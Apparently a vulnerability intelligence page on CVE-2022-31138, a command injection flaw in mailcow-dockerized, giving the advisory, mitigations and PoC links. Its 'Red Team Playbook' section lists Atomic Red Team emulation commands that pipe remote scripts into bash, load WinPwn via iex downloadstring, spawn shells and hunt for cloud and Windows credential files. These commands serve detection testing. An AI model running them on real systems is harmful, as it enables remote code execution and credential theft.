CVE-2022-31138
Overview
This vulnerability is a command injection flaw arising from improper sanitization of custom parameter inputs within the mailcow-dockerized mailserver suite. Specifically, parameters such as regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, and maxlinelengthcmd are susceptible to manipulation. The affected component is the configuration handling mechanism that processes these parameters prior to mailcow-dockerized version 2022-06a.
Vulnerability Description
mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.
Impact
An authenticated mailbox user can leverage this vulnerability to execute arbitrary code on the mailcow server, potentially leading to full system compromise. The attack requires network access and valid mailbox credentials (CVSS vector PR:L), with no user interaction needed (UI:N). This enables unauthorized privilege escalation and lateral movement within the environment, risking data confidentiality, integrity, and availability due to the high impact on confidentiality, integrity, and availability (C:H/I:H/A:H).
Solution
Users must update mailcow-dockerized to version 2022-06a or later by running the provided update.sh script located in the mailcow root directory. As an immediate mitigation, removing the Syncjob ACL from all mailbox users prevents them from modifying the vulnerable parameters. Detailed patch instructions and advisory information are available at the official GitHub security advisory: https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-vx9w-h33p-5vhc.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the mailcow mailserver suite presents a significant risk due to its nature as an extended privilege flaw. This issue arises from the improper handling of custom parameters, which include regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, and maxlinelengthcmd. When exploited, an attacker can manipulate these parameters to execute arbitrary code on the server. This exploitation occurs because the application fails to adequately validate user input, allowing malicious actors to craft requests that bypass security controls. The flaw is particularly concerning as it can lead to unauthorized access and control over the mail server, potentially compromising sensitive email communications and user data.
Attack vectors for this vulnerability are varied, but they primarily revolve around the manipulation of the aforementioned parameters. An attacker could leverage social engineering tactics to gain access to a legitimate user’s account or exploit weak authentication mechanisms to gain entry. Once inside the system, the attacker could issue commands that exploit the vulnerability, leading to arbitrary code execution. Scenarios may include injecting malicious scripts that could alter configurations, exfiltrate sensitive data, or even pivot to other systems within the network. Given the nature of mail servers as critical infrastructure for communication, the potential for widespread impact is significant.
The real-world impact of this vulnerability extends beyond technical concerns, posing substantial business risks. Organizations relying on mailcow for their email services may face data breaches, loss of customer trust, and potential legal ramifications if sensitive information is compromised. The ability to execute arbitrary code could allow attackers to deploy ransomware, steal intellectual property, or disrupt services, leading to operational downtime. Furthermore, the reputational damage associated with a breach could have long-lasting effects on an organization’s standing in the market, making it imperative for businesses to prioritize the patching of this vulnerability.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and code reviews can help identify potential weaknesses in the mailcow configuration and its handling of user input. Employing intrusion detection systems (IDS) can provide real-time monitoring for suspicious activities that may indicate exploitation attempts. Additionally, organizations should ensure that they are running the latest version of the mailcow suite, as updates include critical patches that address known vulnerabilities. As a temporary measure, removing the Syncjob ACL from all mailbox users can help mitigate the risk by preventing unauthorized changes to settings that could be exploited.
In conclusion, the extended privilege vulnerability in the mailcow mailserver suite represents a serious threat that necessitates immediate attention from organizations utilizing this software. The potential for arbitrary code execution highlights the importance of robust input validation and the need for timely updates to software systems. By adopting proactive detection and mitigation strategies, organizations can safeguard their email communications and maintain the integrity of their operations in the face of evolving cybersecurity threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-31138, accompanied by the emergence of new proof-of-concept exploits publicly available on prominent code repositories. This development indicates an expanding attacker toolkit that lowers the barrier for adversaries to leverage the extended privilege vulnerability within mailcow-dockerized environments. Our telemetry shows a moderate increase in the Exploit Prediction Scoring System (EPSS) value, reflecting growing confidence in the exploitability of this flaw. While the short-term trend remains stable, the sustained presence of active exploitation tools signals heightened risk for organizations running unpatched mailcow instances. This evolution elevates the threat level by increasing the likelihood of successful arbitrary code execution attacks, thereby amplifying potential operational disruption and data compromise risks. Defenders should recognize that the expanding exploit landscape and increased attacker interest underscore the urgency of monitoring for related indicators and reassessing exposure to this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mailcow | Mailcow\ | _dockerized |
cpe:2.3:a:mailcow:mailcow\:_dockerized:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ly1g3/Mailcow-CVE-2022-31138
Mailcow CVE-2022-31138 RCE
|
ly1g3 | 2 | 0 | 2022-07-11 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
45%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-31138 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-vx9w-h33p-5vhc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mailcow/mailcow-dockerized/commit/d373164e13a14e058f82c9f1918a5612f375a9f9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ly1g3/Mailcow-CVE-2022-31138 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-06a |